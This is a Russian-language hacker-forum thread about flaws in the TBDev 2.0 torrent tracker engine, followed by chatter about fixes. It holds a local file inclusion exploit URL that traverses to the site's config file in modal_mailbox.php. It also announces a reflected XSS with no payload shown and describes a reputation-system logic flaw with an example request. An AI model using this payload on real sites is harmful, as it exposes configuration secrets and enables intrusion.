Трекер-движок TBDev 2.0

Discussion in 'Веб-уязвимости' started by Qwazar, 5 Aug 2008.

  1. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Восстанавливаем забытую тему =)

    Уязвимость скрипта: modal_mailbox.php (чат)
    Тип: Локальный Инклуд

    Уязвимый параметр: ?action

    Exploit: http://examle.com/modal_mailbox.php?action=../include/config


    Внимание, возможно потребуется регистрация на сайте.


    Автор: OxoTnik
     
    1 person likes this.
  2. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Небольшой UP

    passive XSS (reflected)

    Уязвимый сценарий: redirector.php

    Exploit:
     
    1 person likes this.
  3. Yuna

    Yuna Member

    Joined:
    22 Jun 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    12
    Бу, ну как - новых уязвимостей не появилось?

    А-то руки чешутся git push сделать с багфиксами =)
    А пока поделюсь:

    Как известно, в движке, на данный момент, есть система репутации (Респекты).
    Так вот, даже если юзер отключил приём личных сообщений, то:

    1. Ему вс1равно будут идти сообщения от системы репутации
    2. Система не делает валидацию того за то получает человек респект (т.е можно получить/дать респект/антиреспект за торрент который ты не заливал/которого вообще не сущесвтует :D )

    Пример:
    simpaty.php?action=add&good&targetid=1&type=torrent1

    Меняем type=torrent1 на torrent12345 и респект всёравно проходит.
    Не совсем уязвимость, скорее алгоритмическая недоработка :)
     
    1 person likes this.
  4. Грабитель

    Joined:
    5 Mar 2013
    Messages:
    196
    Likes Received:
    12
    Reputations:
    -7
    Отличное отношение к багам. Типичный "разработчик".
     
  5. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    to yuna движок был интересен в свое время, сейчас аналогов много , а делать гит с багфиксами, смысл, если двиг не обновляется
     
    _________________________
  6. Yuna

    Yuna Member

    Joined:
    22 Jun 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    12
    HAXTA4OK, а что в твоем понимании "обновляется"?